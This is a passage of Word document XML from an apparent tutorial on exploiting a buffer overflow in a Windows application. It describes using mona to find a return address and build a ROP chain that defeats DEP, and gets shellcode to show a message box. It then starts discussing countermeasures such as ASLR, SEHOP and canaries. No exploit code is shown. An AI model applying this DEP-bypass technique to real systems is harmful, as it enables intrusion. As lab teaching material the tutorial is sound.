              <w:t>Under “Performance” select “Settings”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C0AE216" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Navigate to “Data Execution Prevention”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6890302B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Select “Turn on DEP for all programs”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E94DB14" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Then restart the computer to cause the change to take effect</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FA578F7" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="9345" w:dyaOrig="5205" w14:anchorId="710A95C3">
                <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:467.25pt;height:260.25pt;visibility:visible;mso-wrap-style:square" o:ole="">
                  <v:imagedata r:id="rId39" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1682840533" r:id="rId40"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B974A78" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1185"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7610D9E6" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Mona is a tool that can be used to run </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> different commands, including identifying where there is a return command in the program. This can be inserted into the EIP to gain control of the program by getting it to execute the shellcode on the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F843394" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E205FD0" wp14:editId="7B087FB5">
            <wp:extent cx="4819680" cy="285840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31"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4819680" cy="285840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBBABAE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc71564059"/>
      <w:r>
        <w:t>Figure 23 - Mona Find Command</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="73B5EFE0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>This generates a file called “find.txt” in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C05106" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>C:\Program Files\Immunity Inc\Immunity Debugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF11557" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>In this file there is a list of all the return (“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>retn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">”) commands in the program. When selecting the address to use it is important to not use one that is designated as “WRITECOPY” but rather “EXECUTE_READ”. An example can be seen in </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71632077 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Figure 24 - Excerpt of find.txt</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the address 0x77c11110. This is the address that will be given to the EIP to get it to trigger the return command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CC935C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10183818" wp14:editId="0C2CB595">
            <wp:extent cx="5846399" cy="1876320"/>
            <wp:effectExtent l="0" t="0" r="1951" b="0"/>
            <wp:docPr id="32"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846399" cy="1876320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="373DE15A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc71564060"/>
      <w:bookmarkStart w:id="64" w:name="_Ref71632077"/>
      <w:r>
        <w:t>Figure 24 - Excerpt of find.txt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="5BFB049F" w14:textId="33B8A167" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>The next step is generating a ROP chain. A ROP chain is a series of memory locations that can be navigated to, containing commands that will re-enable code execution on the stack. This will then allow for the injected shellcode to run just as it did when DEP was disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ED3A2D" w14:textId="2D748CC7" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>To create the ROP chain mona can again be used. With mona it is possible to automatically generate a ROP chain and the code required to inject it. However, when generating the ROP chain it is important to designate all the bad characters. In addition to the ones discovered earlier it is also important to designate NULL and new line bytes as bad characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DDB832" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A3EC5D5" wp14:editId="453858C4">
            <wp:extent cx="4419720" cy="304920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33"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4419720" cy="304920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF04CED" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc71564061"/>
      <w:r>
        <w:t>Figure 25 - Mona ROP Command</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="23C3F631" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Just as before this will create a file in the following directory. This one, however, will be called “rop_chains.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC88454" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>C:\Program Files\Immunity Inc\Immunity Debugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A894BC7" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402CF326" w14:textId="44102FFA" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This will not just generate a single ROP chain. It will attempt to create </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> different ROP chains. To determine which one will work it is important to look for a complete chain which can be identified by ensuring there are no NULL addresses like the one shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C77908">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C77908">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref71632683 </w:instrText>
      </w:r>
      <w:r w:rsidR="00820F0A" w:rsidRPr="00C77908">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C77908">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C77908">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>Figure 26 - NULL Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77908">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00820F0A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1778DB30" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127D86E0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DB22F9F" wp14:editId="57D9A720">
            <wp:extent cx="5943600" cy="167040"/>
            <wp:effectExtent l="0" t="0" r="0" b="4410"/>
            <wp:docPr id="34"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5943600" cy="167040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ABE8F5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc71564062"/>
      <w:bookmarkStart w:id="67" w:name="_Ref71632683"/>
      <w:r>
        <w:t>Figure 26 - NULL Address</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="0214F7F1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7978929E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once a successful ROP chain has been identified, such as the one found in Appendix C, the next stage is to inject the chain. It is possible to craft a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ropchain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> python file such as the one found in Appendix A – Ropchain.py using the memory address for an executable return as EIP and by loading the ROP chain before the exploit. The order in which these should be placed can be seen in </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref71632746 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 27 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ecerpt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from Ropchain.py</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. This is important as the ROP chain needs to trigger first to enable code execution before the shellcode attempts to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219DAED7" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53ED5196" wp14:editId="525FD4F6">
            <wp:extent cx="5089679" cy="247680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35"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5089679" cy="247680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="394926D4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc71564063"/>
      <w:bookmarkStart w:id="69" w:name="_Ref71632746"/>
      <w:r>
        <w:t xml:space="preserve">Figure 27 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ecerpt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from Ropchain.py</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="466359BF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>This will generate an .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file, as shown in Appendix B – Ropchain.ini, that can be submitted to the application. This will result in the shellcode calling a message box, as shown below in </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71632801 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Figure 28 - ROP Chain Message Box</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C76E035" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4179C9AB" wp14:editId="783A78F6">
            <wp:extent cx="4619520" cy="1990800"/>
            <wp:effectExtent l="0" t="0" r="0" b="9450"/>
            <wp:docPr id="36"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4619520" cy="1990800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="278439B5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc71564064"/>
      <w:bookmarkStart w:id="71" w:name="_Ref71632801"/>
      <w:r>
        <w:t>Figure 28 - ROP Chain Message Box</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="16A69053" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EFB8324" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc71564011"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Discussion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="61E2BE63" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc71564012"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Countermeasures and Evasion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="52AED2A7" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>When it comes to countermeasures for buffer overflow attacks there are two methods. These include securing either the operating system or the application. Because this tutorial covers an application programmed in C and on a machine running on 32bit windows it will focus on how to best secure this application on this machine. That means focusing on deploying countermeasures for the operating system that will prevent buffer overflow attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D41FB8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There are four main countermeasures that have been developed within the operating system for buffer overflow attacks. During this last stage of the tutorial these measures will be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>analysed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and potential workarounds discussed. The countermeasures that will be looked at include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD1A186" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Data Execution Prevention (DEP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682E56B0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Address Space Layout Randomization (ASLR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C082F1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Structured exception handler </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>overwrite</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> protection (SEHOP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C2BB1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Canaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D524D4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">All the countermeasures created acknowledge that it is impossible to completely prevent unexpected submissions to the application without changing the code of the application. To this end, each takes a different approach to stop the code that has been submitted from successfully executing (What is Buffer Overflow? How to Prevent Buffer Overflows? </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ITperfection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F2B8D9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21AA42E3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc71564013"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="1BD4C114" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BFFE219" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>DEP was shown as an example during this tutorial of one way to prevent a buffer overflow attack. This is achieved by ensuring that the values that are passed onto the stack are not executable. This means that, while code can be passed into the application, no commands on the stack will run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3291BE03" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>This can be countered, as demonstrated in the ROP section of the procedure, by passing in memory locations that point to code that will be executed. By pointing at the right pieces of code in the right order it is thereby possible to cause the application to re-enable the ability to execute code on the stack. By passing in code after this ROP chain has re-enabled code execution, it is then possible to run any shellcode on the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C334645" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="761B7BFC" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="F" w:hAnsi="Arial" w:cs="F"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc71564014"/>
    </w:p>
    <w:p w14:paraId="17707839" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ASLR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="50C0D7FB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
